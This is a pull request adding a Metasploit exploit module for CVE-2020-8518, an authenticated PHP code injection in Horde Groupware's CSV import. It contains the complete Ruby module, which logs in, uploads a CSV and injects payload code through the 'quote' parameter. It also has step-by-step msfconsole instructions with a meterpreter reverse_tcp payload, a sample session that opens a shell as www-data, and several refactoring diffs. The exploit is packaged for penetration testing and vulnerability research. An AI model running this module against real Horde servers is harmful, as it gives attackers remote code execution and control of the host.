### PR TITLE
Add 'Horde CSV import arbitrary PHP code execution' (CVE-2020-8518)

### DIFF
--- a/documentation/modules/exploit/multi/http/horde_csv_rce.md
+++ b/documentation/modules/exploit/multi/http/horde_csv_rce.md
@@ -1,0 +1,51 @@
+## Vulnerable Application
+
+The Horde project comprises several standalone applications and libraries, the [Horde Groupware Webmail Edition suite](https://www.horde.org/apps/webmail) (tested version 5.2.22) bundles several of them by default, among those, Data ([Horde Data API](https://github.com/horde/Data)) is a library used to manage data import/export in several formats, e.g., CSV, iCalendar, vCard, etc. This library up to version 2.1.4 (included) is vulnerable to PHP code injection.
+
+Find more information in the [original advisory](https://cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/).
+
+## Verification Steps
+
+  1. Install the application (see below)
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/horde_csv_rce```
+  4. Do: ```set payload php/meterpreter/reverse_tcp```
+  5. Do: ```set lhost [ATTACKER IP]```
+  6. Do: ```set rhost [TARGET IP]```
+  7. Do: ```set username [username]```
+  8. Do: ```set password [password]```
+  9. Do: ```exploit```
+ 10. A session should open
+
+Downgrade the Horde Data API package if needed:
+
+```
+pear uninstall --ignore-errors horde/horde_data-2.1.5
+pear install --ignore-errors horde/horde_data-2.1.4
+```
+
+## Scenarios
+
+### Horde Groupware Webmail Edition 5.2.22 with Horde Data API 2.1.4 on Debian GNU/Linux 9
+
+```
+msf5 > use exploit/multi/http/horde_csv_rce
+msf5 exploit(multi/http/horde_csv_rce) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf5 exploit(multi/http/horde_csv_rce) > set lhost 192.168.1.69
+lhost => 192.168.1.69
+msf5 exploit(multi/http/horde_csv_rce) > set rhost 192.168.1.69
+rhost => 192.168.1.69
+msf5 exploit(multi/http/horde_csv_rce) > set username alice
+username => alice
+msf5 exploit(multi/http/horde_csv_rce) > set password alice
+password => alice
+msf5 exploit(multi/http/horde_csv_rce) > exploit
+
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[*] Sending stage (38288 bytes) to 172.17.0.1
+[*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:44524) at 2020-03-14 14:55:17 +0000
+
+meterpreter > getuid
+Server username: www-data (33)
+```

--- a/modules/exploits/multi/http/horde_csv_rce.rb
+++ b/modules/exploits/multi/http/horde_csv_rce.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_good('CSV file uploaded')
   end
 
-  def execute(cookie, function_call, check)
+  def execute(cookie, function_call)
     options = {
       'method'    => 'POST',
       'uri'       => normalize_uri(target_uri, 'mnemo/data.php'),
@@ -95,36 +95,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'fields'        => '1',
         'sep'           => 'x',
         'quote'         => ").#{function_call}.die();}//\\"}}
-    if check
-      # deliver the payload and return the body
-      res = send_request_cgi(options)
-      unless res && res.code == 200
-        fail_with(Failure::UnexpectedReply, 'Cannot execute the payload')
-      end
-
-      vprint_good('Payload executed successfully')
-      return res.body
-    else
-      # deliver the payload in a a new thread since the meterpreter payload does
-      # not terminate when successful this allows to poll for session creation
-      t = framework.threads.spawn(nil, false) {
-        send_request_cgi(options)
-      }
-      while t.alive? and not session_created?
-        Rex::ThreadSafe.sleep(0.1)
-      end
+    # deliver the payload in a a new thread since the meterpreter payload does
+    # not terminate when successful this allows to poll for session creation
+    t = framework.threads.spawn(nil, false) {
+      send_request_cgi(options)
+    }
+    while t.alive? and not session_created?
+      Rex::ThreadSafe.sleep(0.1)
     end
-  end
-
-  def check
-    begin
-      cookie = login()
-      upload_csv(cookie)
-      body = execute(cookie, 'printf("check")', true)
-      return Exploit::CheckCode::Appears if body == 'check'
-    rescue Msf::Exploit::Failed
-    end
-    return Exploit::CheckCode::Safe
   end
 
   def exploit
@@ -133,6 +111,6 @@ class MetasploitModule < Msf::Exploit::Remote
     # do not terminate the statement
     function_call = payload.encoded.tr(';', '')
     vprint_status("Sending payload: #{function_call}")
-    execute(cookie, function_call, false)
+    execute(cookie, function_call)
   end
 end

--- a/modules/exploits/multi/http/horde_csv_rce.rb
+++ b/modules/exploits/multi/http/horde_csv_rce.rb
@@ -1,0 +1,138 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Horde CSV import arbitrary PHP code execution',
+        'Description'    => %q{
+
+          The Horde_Data module version 2.1.4 (and before) present in Horde
+          Groupware version 5.2.22 allows allows authenticated users to inject
+          arbitrary PHP code thus achieving RCE on the server hosting the web
+          application.
+
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         => ['Andrea Cardaci <cyrus.and@gmail.com>'],
+        'References'     => [
+          ['CVE', '2020-8518'],
+          ['URL', 'https://cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/']
+        ],
+        'DisclosureDate' => '2020-02-07',
+        'Platform'       => 'php',
+        'Arch'           => ARCH_PHP,
+        'Targets'        => [['Automatic', {}]],
+        'Payload'        => {'BadChars' => "'"},
+        'Privileged'     => false,
+        'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to the web application', '/']),
+        OptString.new('USERNAME',  [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD',  [true, 'The password to authenticate with'])
+      ])
+  end
+
+  def login
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri, 'login.php'),
+      'cookie'    => 'Horde=x', # avoid multiple Set-Cookie
+      'vars_post' => {
+        'horde_user' => username,
+        'horde_pass' => password,
+        'login_post' => '1'})
+    if not res or res.code != 302 or res.headers['Location'] != '/services/portal/'
+      fail_with(Failure::UnexpectedReply, 'Login failed or application not found')
+    else
+      vprint_good("Logged in as #{username}:#{password}")
+      return res.get_cookies
+    end
+  end
+
+  def upload_csv(cookie)
+    data = Rex::MIME::Message.new
+    data.add_part('11',  nil, nil, 'form-data; name="actionID"')
+    data.add_part('1',   nil, nil, 'form-data; name="import_step"')
+    data.add_part('csv', nil, nil, 'form-data; name="import_format"')
+    data.add_part('x',   nil, nil, 'form-data; name="notepad_target"')
+    data.add_part('x',   nil, nil, 'form-data; name="import_file"; filename="x"')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri, 'mnemo/data.php'),
+      'cookie' => cookie,
+      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+      'data'   => data.to_s)
+    if not res or res.code != 200
+      fail_with(Failure::UnexpectedReply, 'Cannot upload the CSV file')
+    else
+      vprint_good('CSV file uploaded')
+    end
+  end
+
+  def execute(cookie, function_call, check)
+    options = {
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri, 'mnemo/data.php'),
+      'cookie'    => cookie,
+      'vars_post' => {
+        'actionID'      => '3',
+        'import_step'   => '2',
+        'import_format' => 'csv',
+        'header'        => '1',
+        'fields'        => '1',
+        'sep'           => 'x',
+        'quote'         => ").#{function_call}.die();}//\\"}}
+    if check
+      # deliver the payload and return the body
+      res = send_request_cgi(options)
+      if not res or res.code != 200
+        fail_with(Failure::UnexpectedReply, 'Cannot execute the payload')
+      else
+        vprint_good('Payload executed successfully')
+        return res.body
+      end
+    else
+      # deliver the payload in a a new thread since the meterpreter payload does
+      # not terminate when successful this allows to poll for session creation
+      t = framework.threads.spawn(nil, false) {
+        send_request_cgi(options)
+      }
+      while t.alive? and not session_created?
+        Rex::ThreadSafe.sleep(0.1)
+      end
+    end
+  end
+
+  def check
+    begin
+      cookie = login()
+      upload_csv(cookie)
+      body = execute(cookie, 'printf("check")', true)
+      return Exploit::CheckCode::Appears if body == 'check'
+    rescue Msf::Exploit::Failed
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    cookie = login()
+    upload_csv(cookie)
+    # do not terminate the statement
+    function_call = payload.encoded.tr(';', '')
+    vprint_status("Sending payload: #{function_call}")
+    execute(cookie, function_call, false)
+  end
+end

--- a/modules/exploits/multi/http/horde_csv_rce.rb
+++ b/modules/exploits/multi/http/horde_csv_rce.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res && res.code == 302 && res.headers['Location'] == '/services/portal/'
       fail_with(Failure::UnexpectedReply, 'Login failed or application not found')
     end
-    
+
     vprint_good("Logged in as #{username}:#{password}")
     return res.get_cookies
   end
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res && res.code == 200
       fail_with(Failure::UnexpectedReply, 'Cannot upload the CSV file')
     end
-    
+
     vprint_good('CSV file uploaded')
   end
 
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
       unless res && res.code == 200
         fail_with(Failure::UnexpectedReply, 'Cannot execute the payload')
       end
-      
+
       vprint_good('Payload executed successfully')
       return res.body
     else

--- a/modules/exploits/multi/http/horde_csv_rce.rb
+++ b/modules/exploits/multi/http/horde_csv_rce.rb
@@ -75,11 +75,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'cookie' => cookie,
       'ctype'  => "multipart/form-data; boundary=#{data.bound}",
       'data'   => data.to_s)
-    if not res or res.code != 200
+    unless res && res.code == 200
       fail_with(Failure::UnexpectedReply, 'Cannot upload the CSV file')
-    else
-      vprint_good('CSV file uploaded')
     end
+    
+    vprint_good('CSV file uploaded')
   end
 
   def execute(cookie, function_call, check)

--- a/modules/exploits/multi/http/horde_csv_rce.rb
+++ b/modules/exploits/multi/http/horde_csv_rce.rb
@@ -98,12 +98,12 @@ class MetasploitModule < Msf::Exploit::Remote
     if check
       # deliver the payload and return the body
       res = send_request_cgi(options)
-      if not res or res.code != 200
+      unless res && res.code == 200
         fail_with(Failure::UnexpectedReply, 'Cannot execute the payload')
-      else
-        vprint_good('Payload executed successfully')
-        return res.body
       end
+      
+      vprint_good('Payload executed successfully')
+      return res.body
     else
       # deliver the payload in a a new thread since the meterpreter payload does
       # not terminate when successful this allows to poll for session creation

--- a/modules/exploits/multi/http/horde_csv_rce.rb
+++ b/modules/exploits/multi/http/horde_csv_rce.rb
@@ -54,12 +54,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'horde_user' => username,
         'horde_pass' => password,
         'login_post' => '1'})
-    if not res or res.code != 302 or res.headers['Location'] != '/services/portal/'
+    unless res && res.code == 302 && res.headers['Location'] == '/services/portal/'
       fail_with(Failure::UnexpectedReply, 'Login failed or application not found')
-    else
-      vprint_good("Logged in as #{username}:#{password}")
-      return res.get_cookies
     end
+    
+    vprint_good("Logged in as #{username}:#{password}")
+    return res.get_cookies
   end
 
   def upload_csv(cookie)

--- a/modules/exploits/multi/http/horde_csv_rce.rb
+++ b/modules/exploits/multi/http/horde_csv_rce.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description'    => %q{
 
           The Horde_Data module version 2.1.4 (and before) present in Horde
-          Groupware version 5.2.22 allows allows authenticated users to inject
+          Groupware version 5.2.22 allows authenticated users to inject
           arbitrary PHP code thus achieving RCE on the server hosting the web
           application.
 


### PR DESCRIPTION
This adds a module for the vulnerability in the subject. Follows an excerpt from the documentation.

## Vulnerable Application

The Horde project comprises several standalone applications and libraries, the [Horde Groupware Webmail Edition suite](https://www.horde.org/apps/webmail) (tested version 5.2.22) bundles several of them by default, among those, Data ([Horde Data API](https://github.com/horde/Data)) is a library used to manage data import/export in several formats, e.g., CSV, iCalendar, vCard, etc. This library up to version 2.1.4 (included) is vulnerable to PHP code injection.

Find more information in the [original advisory](https://cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/).

## Verification Steps

  1. Install the application (see below)
  2. Start msfconsole
  3. Do: ```use exploit/multi/http/horde_csv_rce```
  4. Do: ```set payload php/meterpreter/reverse_tcp```
  5. Do: ```set lhost [ATTACKER IP]```
  6. Do: ```set rhost [TARGET IP]```
  7. Do: ```set username [username]```
  8. Do: ```set password [password]```
  9. Do: ```exploit```
 10. A session should open

Downgrade the Horde Data API package if needed:

```
pear uninstall --ignore-errors horde/horde_data-2.1.5
pear install --ignore-errors horde/horde_data-2.1.4
```

---

This is my first MSF module submission, I apologize if something's wrong or missing.